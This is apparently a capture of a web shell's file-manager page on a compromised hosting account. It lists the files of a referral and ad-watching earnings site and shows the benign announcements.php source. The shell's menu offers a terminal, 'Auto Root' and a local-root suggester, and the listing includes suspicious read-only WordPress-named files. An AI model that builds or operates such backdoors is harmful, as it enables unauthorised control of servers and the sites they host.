Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
abayar /
user /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
ajax_spin_wheel.php
3.28
KB
-rw-r--r--
2026-01-26 16:59
announcements.php
3.18
KB
-rw-r--r--
2025-12-25 17:46
daily_targets.php
14.63
KB
-rw-r--r--
2025-12-26 15:26
dashboard.php
35.82
KB
-rw-r--r--
2026-01-07 16:12
dpin_manage.php
8.8
KB
-rw-r--r--
2025-12-29 11:57
dpin_request.php
10.85
KB
-rw-r--r--
2025-12-29 11:57
error_log
3.62
KB
-rw-r--r--
2025-12-29 11:07
footer.php
101
B
-rw-r--r--
2025-12-25 18:14
header.php
6.83
KB
-rw-r--r--
2026-01-26 17:33
history.php
25.06
KB
-rw-r--r--
2026-01-26 17:23
level_earning.php
18.53
KB
-rw-r--r--
2025-12-29 13:08
lucky_wheel.php
30.91
KB
-rw-r--r--
2026-01-26 17:01
my_plan.php
9.99
KB
-rw-r--r--
2025-12-29 11:04
plan_payment.php
19.84
KB
-rw-r--r--
2026-01-26 16:58
profile.php
9.06
KB
-rw-r--r--
2025-12-24 21:13
ranks.php
21.24
KB
-rw-r--r--
2025-12-27 08:48
referral.php
11.8
KB
-rw-r--r--
2025-12-24 21:26
support.php
10.32
KB
-rw-r--r--
2025-12-22 19:07
update_rank_popup.php
1.1
KB
-rw-r--r--
2025-12-27 08:47
watch_ad.php
6.68
KB
-rw-r--r--
2025-12-26 09:11
watch_ad_complete.php
4.34
KB
-rw-r--r--
2025-12-24 08:07
watch_ads.php
6.73
KB
-rw-r--r--
2025-12-24 08:08
withdraw.php
11.24
KB
-rw-r--r--
2025-12-24 22:35
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php define('USER_PANEL', true); require_once '../includes/config.php'; requireLogin(); $page_title = 'Site Announcements'; // Get active announcements $stmt = $pdo->query("SELECT * FROM announcements WHERE is_active = 1 ORDER BY created_at DESC"); $updates = $stmt->fetchAll(); include 'header.php'; ?> <div style="background: linear-gradient(135deg, var(--primary-color), #6366f1); padding: 30px 20px; border-radius: 20px; color: white; margin-bottom: 25px; text-align: center; box-shadow: 0 10px 20px rgba(0,0,0,0.1);"> <div style="width: 60px; height: 60px; background: rgba(255,255,255,0.2); border-radius: 50%; display: flex; align-items: center; justify-content: center; margin: 0 auto 15px; font-size: 24px; backdrop-filter: blur(10px);"> <i class="fas fa-bullhorn"></i> </div> <h2 style="margin: 0; font-size: 24px; font-weight: 800;">Latest Updates</h2> <p style="margin: 5px 0 0; opacity: 0.9; font-size: 14px;">Stay informed with our latest news and announcements.</p> </div> <?php if (empty($updates)): ?> <div class="card" style="text-align: center; padding: 40px 20px;"> <i class="fas fa-box-open" style="font-size: 40px; color: var(--text-secondary); margin-bottom: 15px;"></i> <p style="color: var(--text-secondary); font-size: 16px;">No announcements posted yet.</p> </div> <?php else: ?> <?php foreach ($updates as $item): ?> <div class="card" style="margin-bottom: 20px; border-left: 5px solid var(--<?php echo $item['type']; ?>-color); overflow: hidden; animation: slideUp 0.5s ease-out forwards;"> <div class="card-body" style="padding: 20px;"> <div style="display: flex; justify-content: space-between; align-items: flex-start; margin-bottom: 15px;"> <div> <h3 style="margin: 0; font-size: 18px; color: var(--text-primary); font-weight: 700;"> <?php echo htmlspecialchars($item['title']); ?></h3> <small style="color: var(--text-secondary); display: block; margin-top: 4px;"> <i class="far fa-calendar-alt"></i> <?php echo date('M d, Y h:i A', strtotime($item['created_at'])); ?> </small> </div> <span class="badge badge-<?php echo $item['type']; ?>" style="padding: 5px 12px; border-radius: 50px; font-size: 11px; text-transform: uppercase; letter-spacing: 0.5px;"> <?php echo ucfirst($item['type']); ?> </span> </div> <div style="color: var(--text-secondary); line-height: 1.6; font-size: 15px;"> <?php echo nl2br(htmlspecialchars($item['message'])); ?> </div> </div> </div> <?php endforeach; ?> <?php endif; ?> <style> @keyframes slideUp { from { opacity: 0; transform: translateY(20px); } to { opacity: 1; transform: translateY(0); } } </style> <?php include 'footer.php'; ?>